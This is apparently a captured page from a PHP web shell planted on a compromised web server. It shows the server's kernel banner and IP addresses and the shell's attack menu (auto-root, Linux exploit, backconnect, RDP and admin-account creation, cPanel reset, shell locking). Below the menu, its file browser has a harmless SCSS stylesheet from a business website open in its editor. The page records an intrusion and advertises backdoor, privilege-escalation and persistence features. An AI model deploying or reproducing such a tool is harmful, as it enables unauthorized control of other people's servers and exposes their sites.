Linux 45-56-67-123 5.14.0-503.16.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Dec 13 01:47:05 EST 2024 x86_64
Apache/2.4.62 (AlmaLinux) OpenSSL/3.2.2
: 45.56.67.123 | : 3.147.75.9
Cant Read [ /etc/named.conf ]
8.3.15
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
website2024 /
pjmachinerypart.com /
scss /
[ HOME SHELL ]
Name
Size
Permission
Action
_banner.scss
1.64
KB
-rwxr-xr-x
_blog.scss
16.97
KB
-rwxr-xr-x
_button.scss
4.21
KB
-rwxr-xr-x
_contact.scss
4.01
KB
-rwxr-xr-x
_counter.scss
627
B
-rwxr-xr-x
_feature.scss
3.84
KB
-rwxr-xr-x
_footer.scss
3.27
KB
-rwxr-xr-x
_header.scss
7.88
KB
-rwxr-xr-x
_portfolio.scss
14.81
KB
-rwxr-xr-x
_predefin.scss
5.23
KB
-rwxr-xr-x
_service.scss
10.25
KB
-rwxr-xr-x
_slider.scss
6.93
KB
-rwxr-xr-x
_team.scss
7.47
KB
-rwxr-xr-x
_variables.scss
857
B
-rwxr-xr-x
style.scss
2.86
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : _button.scss
/* Border get Button area css ============================================================================================ */ .get_btn{ display: inline-block; padding: 0px 35px; border: 2px solid $baseColor; line-height: 50px; font-size: 20px; font-family: $open; text-transform: uppercase; color: #fff; font-weight: bold; position: relative; z-index: 2; overflow: hidden; transition: color .5s; &:before{ content: ""; position: absolute; z-index: -1; background: $baseColor; height: 250px; width: 300px; border-radius: 50%; left: 50%; transform: translateX(-50%); bottom: 100%; transition: all .7s; } &:hover{ color: $dip; &:before{ bottom: -50px; } } } /* End Border get Button area css ============================================================================================ */ /* End Border get Button area css ============================================================================================ */ .view_btn{ display: inline-block; background: $dip; text-align: center; padding: 0px 20px; border-radius: 5px; line-height: 28px; color: $gray; font-family: $mon; font-size: 12px; @include transition; &:hover{ color: $gray; } } /* End Border get Button area css ============================================================================================ */ /* End get bg Button area css ============================================================================================ */ .get_bg_btn{ display: inline-block; padding: 0px 35px; border: 2px solid $baseColor; line-height: 50px; font-size: 20px; font-family: $open; text-transform: uppercase; color: $dip; font-weight: bold; position: relative; z-index: 2; overflow: hidden; transition: color .5s; &:before{ content: ""; position: absolute; z-index: -1; background: $baseColor; height: 250px; width: 300px; border-radius: 50%; left: 50%; transform: translateX(-50%); bottom: -50px; transition: all .7s; } &:hover{ color: $baseColor; &:before{ bottom: 100%; } } } .get_btn_black{ display: inline-block; padding: 0px 35px; line-height: 50px; font-size: 20px; font-family: $open; text-transform: uppercase; color: #fff; font-weight: bold; position: relative; z-index: 2; overflow: hidden; transition: color .5s; background: $dip; border: 2px solid $dip; &:before{ content: ""; position: absolute; z-index: -1; background: $baseColor; height: 250px; width: 300px; border-radius: 50%; left: 50%; transform: translateX(-50%); bottom: 100%; transition: all .7s; } &:hover{ color: $dip; &:before{ bottom: -50px; } } } .slider_btn{ display: inline-block; padding: 0px 36px; border: 2px solid $baseColor; line-height: 50px; font-size: 20px; font-family: $open; text-transform: uppercase; color: #2c2c2c; font-weight: bold; position: relative; z-index: 2; overflow: hidden; transition: color .5s; &:before{ content: ""; position: absolute; z-index: -1; background: $baseColor; height: 250px; width: 320px; border-radius: 50%; left: 50%; transform: translateX(-50%); bottom: -50px; transition: all .7s; } &:hover{ color: #fff; &:before{ bottom: 100%; } } } .submit_btn{ box-shadow: none; background: $baseColor; border-radius: 0px; border: 1px solid $baseColor; color: #fff; text-transform: uppercase; font-family: $open; font-weight: bold; font-size: 14px; @include transition; line-height: 42px; padding: 0px; height: 42px; &:hover{ background: #fff; color: $dip; } } /* End get bg Button area css ============================================================================================ */
Close